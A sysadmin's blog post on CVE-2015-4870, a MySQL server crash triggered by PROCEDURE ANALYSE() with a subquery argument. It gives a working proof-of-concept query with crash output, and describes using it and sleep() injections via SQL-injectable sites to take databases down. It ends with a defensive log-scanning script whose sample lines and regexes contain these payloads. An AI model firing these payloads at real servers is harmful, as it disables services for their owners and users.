MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

Sri Lankan security researcher Osanda Malith discovered a DoS (server crash) vulnerability in MySQL's PROCEDURE ANALYSE() function. The vulnerability crashes MySQL versions up to 5.5.45.

MySQL DoS/crash vulnerability details #

Osanda Malith found this crash in the function PROCEDURE ANALYSE() when a subquery is passed as its first argument. Its syntax:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an example PoC (here run against information_schema.tables, a table every MySQL server has) would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
 
mysql>

On Windows, a single such request crashes the server process (mysqld.exe, the server, not the mysql.exe client) and an administrator has to restart the MySQL service by hand. On *nix systems mysqld is normally brought back automatically (mysqld_safe respawns it after a crash), but an attacker who keeps sending HTTP requests carrying this payload keeps the database effectively down.

Taking advantage (exploiting the crash bug) #

Osanda Malith writes:

If you come across a website vulnerable to SQL injection, you can simply perform a DoS attack so that the MySQL server will not respond and the entire database of the website would be down, meaning the website will no longer be in an active state.
In Windows-based systems, in a single request the process will crash. We have to manually restart the MySQL server.

This sounds like a very nasty side effect of an SQL injection vulnerability. In August 2014 I wrote about MySQL sleep() attacks being carried out in the wild. There an attacker injects sleep(3) into a vulnerable web application, making mysqld pause for the given number of seconds, once for every row the injected expression is evaluated against (depending on where the sleep() is injected, of course). That was a denial of service attack on the whole MySQL server: each injected query held its connection open for seconds, quickly consuming all available connections.


This crash/DoS vulnerability, however, requires only one request to crash mysqld.exe on Windows Server, and a continuous stream of requests on Linux/Unix operating systems, because there the mysqld service is restarted automatically.
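Both attacks described above (the sleep() connection exhaustion and the PROCEDURE ANALYSE() crash) arrive as ordinary HTTP requests against an injectable parameter, so they leave traces in the web server's access log. The following Python script is an added example, not code from this post or from Osanda Malith's write-up: it reads Apache combined-format access-log lines, URL-decodes each request target (repeatedly, to catch double encoding), strips inline `/**/` comments that are used to split keywords, and flags the two payload shapes. The log lines, IP addresses, paths and rule names are constructed for the example.

```python
"""Spot MySQL denial-of-service payloads in web server access logs.

Added example (not from the original post). Flags two injection shapes:
PROCEDURE ANALYSE() called with a subquery argument (the CVE-2015-4870
crash) and sleep()/benchmark() delay injections. Sample log lines below
are constructed; the IPs and paths are not real traffic.
"""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines: one benign request, one
# PROCEDURE ANALYSE crash payload, and two sleep() variants (plus-encoded
# spaces, and an inline comment between the function name and its paren).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2015:12:00:01 +0200] "GET /item.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2015:12:00:02 +0200] "GET /item.php?id=1%20procedure%20analyse((select*from(select%201)x),1) HTTP/1.1" 500 0 "-" "curl/7.43"
198.51.100.7 - - [10/Aug/2015:12:00:03 +0200] "GET /item.php?id=1+AND+SLEEP(3) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2015:12:00:04 +0200] "GET /item.php?id=1%20and%20sleep%2F**%2F(3) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Pull the client IP and the request target out of a combined-format line.
REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Ordered rules; the first match wins. Hypothetical rule names.
RULES = [
    # PROCEDURE ANALYSE(( SELECT ... : subquery as the first argument
    ("procedure_analyse_crash",
     re.compile(r"procedure\s*analyse\s*\(\s*\(\s*select\b")),
    # time-based delays that tie up a connection per row
    ("sleep_delay", re.compile(r"\b(?:sleep|benchmark)\s*\(")),
]


def normalize(raw: str) -> str:
    """URL-decode (repeatedly), drop /**/ comments, collapse whitespace, lowercase."""
    text = raw
    for _ in range(3):  # bounded: defeats double/triple encoding without looping forever
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", "", text)  # sleep/**/(3) -> sleep(3)
    text = re.sub(r"\s+", " ", text)       # %09, %0a, + all become one space
    return text.lower()


def classify(target: str):
    """Return the name of the first rule the normalized target matches, else None."""
    norm = normalize(target)
    for name, pattern in RULES:
        if pattern.search(norm):
            return name
    return None


def scan_log(text: str) -> list:
    """Return one finding per flagged request: client IP, rule, decoded target."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_LINE.match(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        rule = classify(match.group("target"))
        if rule:
            findings.append({
                "ip": match.group("ip"),
                "rule": rule,
                "target": normalize(match.group("target")),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']:15}  {finding['rule']:24}  {finding['target']}")
```

Run against a real log with `scan_log(open("/var/log/apache2/access.log").read())` (path assumed). Matching on the decoded, comment-stripped target is what makes the check worthwhile: a naive grep for `PROCEDURE ANALYSE` misses `%20`, `+` and `/**/` variants. Only GET parameters are visible this way; payloads sent in POST bodies need the application's own query logging or the MySQL general log.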

Full MySQL Vulnerability details blog post #

Read the full details in Osanda Malith’s blog post.

About the Author Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, websites & optimization.
